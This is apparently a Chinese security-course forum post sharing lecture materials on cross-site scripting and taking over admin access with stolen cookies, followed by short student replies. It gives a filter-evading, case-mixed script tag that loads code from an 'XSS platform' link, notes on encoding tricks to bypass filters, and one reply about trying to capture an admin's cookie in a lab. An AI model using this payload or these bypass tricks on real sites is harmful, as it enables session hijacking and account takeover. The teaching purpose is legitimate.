2.3、Xss跨站脚本攻击— 通过cookie伪造目标权限【直播回放-课件贴】
PPT、课程直播、回放已打包至附件!
直播回放观看:https://ke.qq.com/course/275794?tuin=62e148
解压密码:zkaq.org
1、如何防御xss? 在关键字符上进行转义输出
我们在进行数据库下载的时候,将databse下载了下来,读了管理员密码,&#%@不能被URL正常解析的。
2、<>→lg、gt 是可以被当作正常解析的
3、当我们进行注入绕过、XSS绕过的时候,也会用到非常多的编码手段进行绕过。这些编码能够让过滤认不出来,但浏览器能够正常识别
4、<sCRiPt sRC=XSS平台的链接></sCrIpT>
打赏我,让我更有动力~
附件列表
3-4.7z 文件大小:1.491M (下载次数:46) 售价:2
登录后才可发表内容
返回首页
CTF&WP专版
jiedu520
发表于 2018-4-1
上边的连接失效了?
评论列表
加载数据中...
pklong007
发表于 2018-4-2
上面的连接的确失效了,附件的还回放也打不开
评论列表
加载数据中...
admin
发表于 2018-4-2
可以正常使用哦!大家刷新一下帖子
评论列表
加载数据中...
1270808374
发表于 2018-4-27
6666
评论列表
加载数据中...
ton2018
发表于 2018-9-5
666666666666666666666666666666666666666666
评论列表
加载数据中...
864691690
发表于 2018-11-18
下载一下
评论列表
加载数据中...
zhao9170
发表于 2019-1-7
66666666
评论列表
加载数据中...
太期待丶
发表于 2019-4-23
机器人是不是坏了 插入xss代码之后拿不到管理员访问的cookie
评论列表
加载数据中...
guren
发表于 2019-7-29
试试
评论列表
加载数据中...